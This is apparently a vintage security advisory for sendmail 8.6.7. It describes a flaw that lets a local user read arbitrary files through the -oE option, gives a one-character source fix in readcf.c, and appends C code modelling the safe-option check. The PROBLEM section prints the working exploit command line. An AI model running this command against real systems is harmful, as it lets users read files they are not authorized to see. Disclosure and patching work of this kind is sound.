COMMAND

    sendmail(8)

SYSTEMS AFFECTED

    Systems running sendmail 8.6.7. See sendmail -d. DG/UX is not at
    risk for the -oE problem. HP/UX does not support the -oE option.
    AIX is not vulnerable to -oE either. SCO does not support the -oE
    option.

PROBLEM

    It's possible to read any file on the system with 8.6.7 from the
    command line. Simply:

	/usr/lib/sendmail -oEfilename_to_read bounce
	From: you_username

SOLUTION

    In file src/readcf.c, line 1078:

        if (!safe && strchr("bCdeEijLmoprsvw7", opt) == NULL)

    Remove the letter 'E' from the string - this makes the option 'E'
    "unsafe".
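
    The effect of that one-character change, as an added example (not
    sendmail source and not part of the original advisory): a model of
    the safe-list test applied to -oX options on a command line. The
    function and macro names, and the rule that an empty option letter
    counts as unsafe, are assumptions of this example; the 8.6.7 string
    and the sample invocation are the ones quoted above.

```c
#include <stdio.h>
#include <string.h>

#define SAFE_OPTS_867   "bCdeEijLmoprsvw7"  /* string quoted in SOLUTION */
#define SAFE_OPTS_FIXED "bCdeijLmoprsvw7"   /* same string with 'E' removed */

/* Model of the check at readcf.c line 1078 (assumed names, not sendmail code).
 * Returns 1 when the option must be treated as unsafe: it did not come from
 * a trusted source (safe == 0) and its letter is not on the safe list. */
int option_is_unsafe(const char *safe_list, int safe, char opt)
{
    if (safe)
        return 0;           /* trusted source: the list is not consulted */
    if (opt == '\0')
        return 1;           /* strchr() would match the string terminator */
    return strchr(safe_list, opt) == NULL;
}

/* Hypothetical helper: first -oX option letter in argv that the list marks
 * unsafe for an untrusted caller, or 0 when every -o option is accepted. */
char first_unsafe_option(const char *safe_list, int argc,
                         const char *const argv[])
{
    for (int i = 1; i < argc; i++) {
        const char *a = argv[i];
        if (a[0] == '-' && a[1] == 'o' &&
            option_is_unsafe(safe_list, 0, a[2]))
            return a[2] ? a[2] : '?';   /* '?' marks a bare "-o" */
    }
    return 0;
}

/* Constructed sample: the invocation shown in the PROBLEM section. */
static const char *const sample_argv[] = {
    "/usr/lib/sendmail", "-oEfilename_to_read", "bounce"
};
#define SAMPLE_ARGC 3

int main(void)
{
    char before = first_unsafe_option(SAFE_OPTS_867, SAMPLE_ARGC, sample_argv);
    char after = first_unsafe_option(SAFE_OPTS_FIXED, SAMPLE_ARGC, sample_argv);

    printf("8.6.7 list: %s\n", before ? "unsafe option found" : "all accepted");
    printf("fixed list: %s\n", after ? "unsafe option found" : "all accepted");
    return 0;
}
```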